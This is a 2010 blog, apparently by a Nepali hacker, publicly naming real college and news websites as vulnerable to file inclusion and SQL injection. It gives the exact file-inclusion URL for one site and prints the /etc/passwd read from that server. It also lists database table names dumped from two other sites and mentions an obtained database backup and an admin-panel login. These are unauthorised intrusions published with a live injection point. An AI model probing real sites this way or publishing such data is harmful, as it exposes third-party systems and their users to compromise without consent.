Sunday 25 April 2010

LACM.EDU.NP [little angels college of management] File inclusion vulnerability

I was checking the site of Little Angels College of Management when they were here in KU for the sports week. & in a while, I found it to be vulnerable to file inclusion vulnerability.
Vulnerable URL is:
http://lacm.edu.np/?lacm=[any_file_to_include]


/etc/passwd:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash postfix:x:89:89::/var/spool/postfix:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin shiva:x:500:500::/home/shiva:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin admispconfig:x:501:501:Administrator ISPConfig:/home/admispconfig:/bin/bash

And I also got the sql Db.. what the hell they are keeping database backup in the website root folder itself.
See you guys.

Ekantipur.com [Ekantipur -online news portal of Kantipur Daily] Vulnerability

Most of us know about Ekantipur.com, online news portal of kantipur daily newspaper. They recently came with new design and development & I was hoping to see securely coded website but I was still able to find some holes in the website. There is a SQL injection vuln in the site of kantipur daily which can be used to potentially dump the DB & then the admin panel can be compromised and possibly we can get shell in the site..
I hope they will soon fix it.. & if they want to get the information of the vulnerability, I would be happy to help them.
Database tables in the current DB:
» daily_updates
» ek_categories
» ek_gallary_comments
» ek_gallary_images
» ek_gallery_image_rating
» ek_news
» ek_news_comments
» ek_news_gallary
» ek_news_gallary_details
» ek_news_keywords
» ek_news_keywords_list
» ek_news_ratings
» ek_news_reporter_list
» ek_news_reporters
» ek_photo_features
» ek_photo_gallary
» ek_sub_categories
» ekn_categories
» ekn_gallary_comments
» ekn_gallary_images
» ekn_gallery_image_rating
» ekn_news
» ekn_news_comments
» ekn_news_gallary
» ekn_news_gallary_details
» ekn_news_keywords
» ekn_news_keywords_list
» ekn_news_ratings
» ekn_news_reporter_list
» ekn_news_reporters
» ekn_photo_features
» ekn_photo_gallary
» ekn_photo_gallary_details
» ekn_sub_categories
» exchange_rates
» horoscope
» horoscope_reading
» horroscope
» kan_categories
» kan_gallary_images
» kan_main_photo
» kan_news
» kan_news_author_list
» kan_news_comments
» kan_news_gallary
» kan_news_gallary_details
» kan_news_keywords
» kan_news_keywords_list
» kan_news_ratings
» kan_news_reporter_list
» kan_news_reporters
» kan_photo_features
» kan_photo_gallary
» kan_photo_gallary_details
» kan_sub_categories
» kq_categories
» kq_gallary_images
» kq_issue
» kq_main_photo
» kq_news
» kq_news_author_list
» kq_news_authors
» kq_news_comments
» kq_news_gallary
» kq_news_gallary_details
» kq_news_keywords
» kq_news_keywords_list
» kq_news_ratings
» kq_photo_features
» kq_photo_gallary
» kq_photo_gallary_details
» kq_sub_categories
» login_records
» models
» models_gallery_images
» nar_categories
» nar_gallary_images
» nar_issue
» nar_news
» nar_news_author_list
» nar_news_authors
» nar_news_comments
» nar_news_gallary
» nar_news_gallary_details
» nar_news_keywords
» nar_news_keywords_list
» nar_news_ratings
» nar_photo_features
» nar_photo_gallary
» nar_photo_gallary_details
» nar_sub_categories
» nep_categories
» nep_gallary_images
» nep_issue
» nep_news
» nep_news_author_list
» nep_news_authors
» nep_news_comments
» nep_news_gallary
» nep_news_gallary_details
» nep_news_keywords
» nep_news_keywords_list
» nep_news_ratings
» nep_photo_features
» nep_photo_gallary
» nep_sub_categories
» nepa_year
» nepse_chart
» news_agency
» news_keywords
» news_status
» news_types
» papers
» photo_gallary_details
» poll_option
» poll_ques
» privilege
» ratings
» sap_blow_up
» sap_categories
» sap_gallary_images
» sap_issue
» sap_news
» sap_news_author_list
» sap_news_authors
» sap_news_comments
» sap_news_gallary
» sap_news_gallary_details
» sap_news_keywords
» sap_news_keywords_list
» sap_news_ratings
» sap_photo_features
» sap_photo_gallary
» sap_photo_gallary_details
» sap_sub_categories
» stock_trading_companies
» tithi
» tkp_categories
» tkp_gallary_images
» tkp_main_photo
» tkp_news
» tkp_news_comments
» tkp_news_gallary
» tkp_news_gallary_details
» tkp_news_keywords
» tkp_news_keywords_list
» tkp_news_ratings
» tkp_news_reporter_list
» tkp_news_reporters
» tkp_photo_features
» tkp_photo_gallary
» tkp_photo_gallary_details
» tkp_sub_categories
» user_paper_privileges
» user_type_privileges
» user_types
» users
» video_categories
» videos
» weather_details
» weather_place
» wp_1_comments
» wp_1_links
» wp_1_options
» wp_1_postmeta
» wp_1_posts
» wp_1_term_relationships
» wp_1_term_taxonomy
» wp_1_terms
» wp_blog_versions
» wp_blogs
» wp_registration_log
» wp_signups
» wp_site
» wp_sitecategories
» wp_sitemeta
» wp_usermeta
» wp_users

No other dumps made over here for the reason of security. Hope they will secure it.
Thank you.

NHNepal.com New Horizons Computer Learning Centers Vulnerability

NHNepal.com is the official site of New Horizons Computer Learning Centers in Nepal which is vulnerable to minor injection attack. This vulnerability was reported to us by someone and full credit goes to him/her for finding this.
They state:
With over 300 centers in 70 countries, New Horizons is the world’s largest independent IT training company. Over the past 25 years, New Horizons has delivered a full range of IT training and business skills training through innovative learning methods that have transformed businesses and helped over 25 million students reach their goals.

Anyway, logged in admin panel screenshot from the hacker himself:

Thanks.. Hope they soon secure it or otherwise they will become victim of another pwnage.

Monday 12 April 2010

Cybersansar vulnerability re-exposed

One of the most visited sites from Nepal, CyberSansar.com is vulnerable to lots of serious injections like SQLi and XSS but today here I'm going to post the SQL injection in the site. I hope they will try to fix the site after reading this post. No offense at all to them. Moreover, the MySQL version is greater than 5 so its easier for the attacker to steal the database information.
User: database => cybernepal3@localhost:cybernepal_3
Tables:
album_detail
album_master
album_person_related
art_gallery
art_gallery_image
art_gallery_path
art_grp_tag_gal
art_tag_gallery
art_tag_photo
art_tags
article_person_related
author
bachelor_user_logon
bc_category_para
bc_final_person_profile
bc_person_profile
bc_photo_folder
bc_profile_list
bc_profile_para
contest_master
contest_question_detail
contest_question_master
cs_birthday_wish
discography
ethnicity_para
ev_gallery
ev_gallery_image
ev_gallery_path
ev_grp_tag_gal
ev_person_related
ev_tag_gallery
ev_tag_photo
ev_tags
event_master
event_para_person_related
event_type
gallery
gallery_image
gallery_path
group_list
grp_tag_gal
job
org_para
org_type
person_persontype
person_taghion
photographer
popular_models
pr_category_para
pr_gallery_image
pr_hion
pr_person_detail
pr_person_profile
pr_persontype
pr_persontype_para
pr_photos
pr_profile_list
pr_profile_para
pr_question_related
pr_subcategory_para
pr_users
profile
profile1
profile_persontype
register_users
section
song_genre_related
song_orginal_singer_related
song_person_related
srw_login
srw_news
tag
tag_article
tag_gallery
tag_list
tag_photo
tags
user_logon
users
users_artist
vdb_music_category
vdb_video_info
vdb_video_info_backup
video_feature_singer_related
video_genre_related
video_orginal_singer_related
video_person_related
wallpaper
wallpaper_gallery 
I'm lazy to dump each column's data lol. Anyway, its just the message to CS how insecure they are.
Hope they fix this soon.